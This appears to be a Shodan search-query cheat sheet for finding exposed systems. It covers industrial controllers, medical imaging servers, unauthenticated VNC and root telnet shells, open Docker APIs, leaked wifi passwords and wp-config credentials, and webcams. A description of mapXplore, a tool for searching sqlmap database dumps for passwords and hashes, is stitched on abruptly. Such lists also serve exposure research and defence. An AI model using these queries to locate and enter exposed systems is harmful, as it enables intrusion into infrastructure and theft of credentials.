"[2J[H Encartele Confidential"

Tesla PowerPack Charging Status

http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

Electric Vehicle Chargers

"Server: gSOAP/2.8" "Content-Length: 583"

Maritime Satellites

Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!

"Cobham SATCOM" OR ("Sailor" "VSAT")

Submarine Mission Control Dashboards

title:"Slocum Fleet Mission Control"

CAREL PlantVisor Refrigeration Units

"Server: CarelDataServer" "200 Document follows"

Nordex Wind Turbine Farms

http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"

C4 Max Commercial Vehicle GPS Trackers

"[1m[35mWelcome on console"

DICOM Medical X-Ray Machines

Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.

"DICOM Server Response" port:104

GaugeTech Electricity Meters

"Server: EIG Embedded Web Server" "200 Document follows"

Siemens Industrial Automation

"Siemens, SIMATIC" port:161

Siemens HVAC Controllers

"Server: Microsoft-WinCE" "Content-Length: 12581"

Door / Lock Access Controllers

"HID VertX" port:4070

Railroad Management

"log off" "select the appropriate"

Tesla Powerpack charging Status:

Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

XZERES Wind Turbine

title:"xzeres wind"

PIPS Automated License Plate Reader

"html:"PIPS Technology ALPR Processors""

Modbus

"port:502"

Niagara Fox

"port:1911,4911 product:Niagara"

GE-SRTP

"port:18245,18246 product:"general electric""

MELSEC-Q

"port:5006,5007 product:mitsubishi"

CODESYS

"port:2455 operating system"

S7

"port:102"

BACnet

"port:47808"

HART-IP

"port:5094 hart-ip"

Omron FINS

"port:9600 response code"

IEC 60870-5-104

"port:2404 asdu address"

DNP3

"port:20000 source address"

EtherNet/IP

"port:44818"

PCWorx

"port:1962 PLC"

Crimson v3.0

"port:789 product:"Red Lion Controls"

ProConOS

"port:20547 PLC"

Remote Desktop

Unprotected VNC

"authentication disabled" port:5900,5901 "authentication disabled" "RFB 003.008"

Windows RDP

99.99% are secured by a secondary Windows login screen.

"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

C2 Infrastructure

CobaltStrike Servers

product:"cobalt strike team server" product:"Cobalt Strike Beacon" ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1 ssl:foren.zik

Brute Ratel

http.html_hash:-1957161625 product:"Brute Ratel C4"

Covenant

ssl:"Covenant" http.component:"Blazor"

Metasploit

ssl:"MetasploitSelfSignedCA"

Network Infrastructure

Hacked routers:

Routers which got compromised hacked-router-help-sos

Redis open instances

product:"Redis key-value store"

Citrix:

Find Citrix Gateway. title:"citrix gateway"

Weave Scope Dashboards

Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.

title:"Weave Scope" http.favicon.hash:567176827

Jenkins CI

"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"

Jenkins:

Jenkins Unrestricted Dashboard x-jenkins 200

Docker APIs

"Docker Containers:" port:2375

Docker Private Registries

"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab

Pi-hole Open DNS Servers

"dnsmasq-pi-hole" "Recursion: enabled"

DNS Servers with recursion

"port: 53" Recursion: Enabled

Already Logged-In as root via Telnet

"root@" port:23 -login -password -name -Session

Telnet Access:

NO password required for telnet access. port:23 console gateway

Polycom video-conference system no-auth shell

"polycom command shell"

NPort serial-to-eth / MoCA devices without password

nport -keyin port:23

Android Root Bridges

A tangential result of Google's sloppy fractured update approach. 🙄 More information here.

"Android Debug Bridge" "Device" port:5555

Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords

Lantronix password port:30718 -secured

Citrix Virtual Apps

"Citrix Applications:" port:1604

Cisco Smart Install

Vulnerable (kind of "by design," but especially when exposed).

"smart install client active"

PBX IP Phone Gateways

PBX "gateway console" -password port:23

Polycom Video Conferencing

http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23

Telnet Configuration:

"Polycom Command Shell" -failed port:23

Example: Polycom Video Conferencing

Bomgar Help Desk Portal

"Server: Bomgar" "200 OK"

Intel Active Management CVE-2017-5689

"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 "Active Management Technology"

HP iLO 4 CVE-2017-12542

HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900

Lantronix ethernet adapter's admin interface without password

"Press Enter for Setup Mode port:9999"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"

Misconfigured Wordpress Sites:

The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"

Outlook Web Access:

Exchange 2007

"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"

Exchange 2010

"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392

Exchange 2013 / 2016

"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"

Lync / Skype for Business

"X-MS-Server-Fqdn"

Network Attached Storage (NAS)

SMB (Samba) File Shares

Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.

"Authentication: disabled" port:445

Specifically domain controllers:

"Authentication: disabled" NETLOGON SYSVOL -unix port:445

Concerning default network shares of QuickBooks files:

"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445

FTP Servers with Anonymous Login

"220" "230 Login successful." port:21

Iomega / LenovoEMC NAS Drives

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

Buffalo TeraStation NAS Drives

Redirecting sencha port:9000

Logitech Media Servers

"Server: Logitech Media Server" "200 OK"

Example: Logitech Media Servers

Plex Media Servers

"X-Plex-Protocol" "200 OK" port:32400

Tautulli / PlexPy Dashboards

"CherryPy/5.1.0" "/home"

Home router attached USB

"IPC$ all storage devices"

Webcams

Generic camera search

title:camera

Webcams with screenshots

webcam has_screenshot:true

D-Link webcams

"d-Link Internet Camera, 200 OK"

Hipcam

"Hipcam RealServer/V1.0"

Yawcams

"Server: yawcam" "Mime-Type: text/html"

webcamXP/webcam7

("webcam 7" OR "webcamXP") http.component:"mootools" -401

Android IP Webcam Server

"Server: IP Webcam Server" "200 OK"

Security DVRs

html:"DVR_H264 ActiveX"

Surveillance Cams:

With username:admin and password: :P NETSurveillance uc-httpd Server: uc-httpd 1.0.0

Printers & Copiers:

HP Printers

"Serial Number:" "Built:" "Server: HP HTTP"

Xerox Copiers/Printers

ssl:"Xerox Generic Root"

Epson Printers

"SERVER: EPSON_Linux UPnP" "200 OK"

"Server: EPSON-HTTP" "200 OK"

Canon Printers

"Server: KS_HTTP" "200 OK"

"Server: CANON HTTP Server"

Home Devices

Yamaha Stereos

"Server: AV_Receiver" "HTTP/1.1 406"

Apple AirPlay Receivers

Apple TVs, HomePods, etc.

"\x08_airplay" port:5353

Chromecasts / Smart TVs

"Chromecast:" port:8008

Crestron Smart Home Controllers

"Model: PYNG-HUB"

Random Stuff

Calibre libraries

"Server: calibre" http.status:200 http.title:calibre

OctoPrint 3D Printer Controllers

title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944

Etherium Miners

"ETH - Total speed"

Apache Directory Listings

Substitute .pem with any extension or a filename like phpinfo.php.

http.title:"Index of /" http.html:".pem"

Misconfigured WordPress

Exposed wp-config.php files containing database credentials.

http.html:"* The wp-config.php creation script uses this file"

Too Many Minecraft Servers

"Minecraft Server" "protocol 340" port:25565

Literally Everything in North Korea

net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24



mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite


mapXplore is a modular application that imports data extracted of the sqlmap to PostgreSQL or SQLite database.

Its main features are:

  • Import of information extracted from sqlmap to PostgreSQL or SQLite for subsequent querying.
  • Sanitized information, which means that at the time of import, it decodes or transforms unreadable information into readable information.
  • Search for information in all tables, such as passwords, users, and desired information.
  • Automatic export of information stored in base64, such as:

    • Word, Excel, PowerPoint files
    • .zip files
    • Text files or plain text information
    • Images
  • Filter tables and columns by criteria.

  • Filter by different types of hash functions without requiring prior conversion.
  • Export relevant information to Excel or HTML

Installation

Requirements

  • python-3.11
git clone https://github.com/daniel2005d/mapXplore
cd mapXplore
pip install -r requirements

Usage

It is a modular application, and consists of the following:

  • config: It is responsible for configuration, such as the database engine to use, import paths, among others.
  • import: It is responsible for importing and processing the information extracted from sqlmap.
  • query: It is the main module capable of filtering and extracting the required information.
    • Filter by tables
    • Filter by columns
    • Filter by one or more words
    • Filter by one or more hash functions within which are:
      • MD5
      • SHA1
      • SHA256
      • SHA3
      • ....

Beginning

Allows loading a default configuration at the start of the program

python engine.py [--config config.json]

Modules



❌